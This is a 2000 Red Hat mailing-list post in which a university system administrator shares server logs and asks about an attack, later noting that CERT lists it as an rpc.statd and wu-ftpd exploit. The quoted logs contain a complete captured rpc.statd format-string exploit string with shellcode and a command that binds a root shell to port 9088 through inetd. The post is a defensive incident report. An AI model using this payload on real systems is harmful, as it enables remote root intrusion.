Uhhh, nevermind, it IS on CERT as an rpc.statd and wu-ftpd exploit. Now to
see if they got in...
Gavin Durman --- Xavier University LAN System Administrator
=================================================
[EMAIL PROTECTED] ICQ: 20277424 http://durman.xu.edu
----------
>From: "Gavin" <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: anyone seen this attack?
>Date: Mon, Nov 6, 2000, 12:56 PM
>
> Has anyone seen this type of attack before? I'm not sure just where to start
> looking other than CERT, but is it a dos, or an exploit of a particular
> OS/package? Thanks!
>
> Here you go...
>
> Active System Attack Alerts
> =-=-=-=-=-=-=-=-=-=-=-=-=-=
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Security Violations
> =-=-=-=-=-=-=-=-=-=
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Unusual System Events
> =-=-=-=-=-=-=-=-=-=-=
> Nov 3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
> Nov 3 18:10:00 www CROND[6059]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:20:00 www CROND[6061]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:30:00 www CROND[6063]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:40:00 www CROND[6065]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing
> '/': ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20ëK^\211v¬\203î
>
> \215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
> \210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
> Nov 3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of
> ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20ëK^\211v¬\203î
>
> \215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
> \210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov 3 18:50:00 www CROND[6067]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
> Nov 3 18:50:43 www rhnsd[766]: command returned:
> Nov 3 19:00:00 www CROND[6071]: (root) CMD (/bin/sh
> /usr/local/etc/logcheck.sh)
> Nov 3 19:00:00 www CROND[6072]: (root) CMD ( /sbin/rmmod -as)
>
>
> Gavin Durman --- Xavier University LAN System Administrator
> =================================================
> [EMAIL PROTECTED] ICQ: 20277424 http://durman.xu.edu
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
